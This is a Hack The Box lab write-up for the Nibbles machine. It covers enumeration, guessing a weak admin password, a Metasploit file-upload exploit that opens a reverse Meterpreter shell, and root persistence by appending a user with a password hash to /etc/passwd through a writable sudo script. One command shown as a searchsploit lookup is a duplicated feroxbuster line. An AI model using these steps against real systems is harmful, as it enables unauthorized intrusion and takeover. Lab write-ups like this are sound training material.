HTB Writeup - Nibbles
Hints
- Ensure that you are enumerating the web application properly. Always remember to do the simple stuff like checking for robots.txt, sitemap.xml, and look at source code.
- If you get a 200 HTTP response code on something that has an interesting name, definitely look at the content, it might reveal important information.
- Think about common password mistakes that are often made by users; they’re not often creative or secure when they’re lazy or in a rush.
- Always check user permissions, whether it’s file permissions or sudo permissions.
Enumeration
As usual, start with an nmap scan to get a listing of open ports and services:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesnt have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
There are only 2 ports open: 80 for the web server hosted by Apache and 22 for SSH.
Going to the web server at route / reveals simple static page with only some testing text. Viewing the page source though reveals a code comment referencing the route /nibbleblog.
Going to the /nibbleblog route shows a blog site powered by ‘Nibbleblog CMS’. Start directory busting in the background while exploring the site. feroxbuster is my current favourite:
feroxbuster -u http://nibbles.htb/nibbleblog/ -w /opt/SecLists/Discovery/Web-Content/raft-large-words.txt
There is not a lot of content in the blog site, but there is a login page for the admin portal at /nibbleblog/admin.php. Additionally, it is possible to find several .xml files while directory busting. Directory listing is enabled on most endpoints allowing for easy navigation and listing of files in the web server. One of the .xml files is /nibbleblog/content/private/users.xml which contains the name of the admin user, simply admin.
No password is available, so it can be presumed that the site has a weak password set. Using /usr/share/wordlists/fasttrack.txt on Kali doesn’t work although it’s a good attempt that covers some general bad passwords. However, the password is even simpler and can be guessed. It is the name of the box, nibbles. Finding this is just a matter of critical thinking.
Exploitation
With authenticated access to the Nibbleblog, it is possible to administer the site. There is a well known CVE for Nibbleblog version 4.0.3, CVE-2015-6967 that can be found just using searchsploit:
feroxbuster -u http://nibbles.htb/nibbleblog/ -w /opt/SecLists/Discovery/Web-Content/raft-large-words.txt -x php
It lists a Metasploit module, which is fairly easy to use:
use multi/http/nibbleblog_file_upload
set LHOST tun0
set LPORT 4444
set TARGETURI /nibbleblog
set USERNAME admin
set PASSWORD nibbles
run
Which successfully gets a shell as the nibbler user on the Nibbles host:
[*] Started reverse TCP handler on 10.10.14.23:4444
[*] Sending stage (39927 bytes) to 10.129.131.58
[+] Deleted image.php
[*] Meterpreter session 1 opened (10.10.14.23:4444 -> 10.129.131.58:40002) at 2024-08-19 19:19:18 +1000
meterpreter > sysinfo
Computer : Nibbles
OS : Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: nibbler
Privilege Escalation
One of the first and simplest things that should be done manually once arriving on a new Linux host is to check sudo privileges by running:
sudo -l
This will reveal what can be done on the machine using elevated privileges for the current user:
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
Being able to run a specific script as root seems like a powerful privilege depending on what the monitor.sh script is. Looking at the script, after unzipping the personal.zip in the nibbler user’s home directory, doesn’t show a very interesting script. However, the permissions to the script file are important. It is writable by the nibbler user.
With the ability to run the script as root and edit the script, the nibbler user can run anything with elevated permissions. Exploitation is trivial at this point:
echo "echo 'pentester:\$6\$XUv5UQT4xk7dlH79\$L0QXFTE.c3FZDesSlFVszVJwZdUpPOtZbjMLQaB7e20Oco3cy1hOmJecg3PMv0i2UGxMooEQcrw/jJ72ccZpj/:0:0:root:/root:/bin/bash' >> /etc/passwd" >> /home/nibbler/personal/stuff/monitor.sh
And then:
sudo /home/nibbler/personal/stuff/monitor.sh
The pentester user with password Pentester123! is now appended to the /etc/passwd file. This new user is effectively root and can be logged in as by doing:
su pentester
As the pentester user and effectively having root permissions, the box has now been fully compromised and persistence achieved.